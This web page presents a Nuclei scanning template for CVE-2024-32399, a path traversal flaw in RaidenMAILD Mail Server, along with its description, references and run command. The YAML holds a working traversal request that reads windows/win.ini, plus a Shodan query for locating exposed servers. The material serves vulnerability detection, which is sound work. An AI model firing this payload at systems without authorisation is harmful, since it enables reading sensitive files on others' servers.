RaidenMAILD Mail Server v.4.9.4 - Path Traversal
ID: CVE-2024-32399
Severity: high
Author: DhiyaneshDK
Tags: cve,cve2024,lfi,raiden,mail,server
Description
Section titled “Description”Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.
YAML Source
Section titled “YAML Source”id: CVE-2024-32399
info: name: RaidenMAILD Mail Server v.4.9.4 - Path Traversal author: DhiyaneshDK severity: high description: | Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component. reference: - https://owasp.org/www-community/attacks/Path_Traversal - https://github.com/NN0b0dy/CVE-2024-32399/blob/main/README.md - https://github.com/NN0b0dy/c01/blob/main/01.pdf - https://github.com/NN0b0dy/CVE-2024-32399 - https://github.com/nomi-sec/PoC-in-GitHub classification: epss-score: 0.00053 epss-percentile: 0.21091 cpe: cpe:2.3:a:raidenmaild:raidenmaild:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"RaidenMAILD" product: raidenmaild vendor: raidenmaild tags: cve,cve2024,lfi,raiden,mail,server
http: - method: GET path: - "{{BaseURL}}/webeditor/../../../windows/win.ini"
matchers: - type: dsl dsl: - 'contains_all(body, "[fonts]", "for 16-bit app support")' - 'contains(header, "application/octet-stream")' - 'status_code == 200' condition: and# digest: 490a0046304402203de462c18cf822b6ee3796391e18ce24c2f0a2e2e1b76409bef6d73a743287060220762bdd77b3c13145d21e647ae13d0cd8957c2ba9c9d08c1458d01b542688eacd:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-32399.yaml"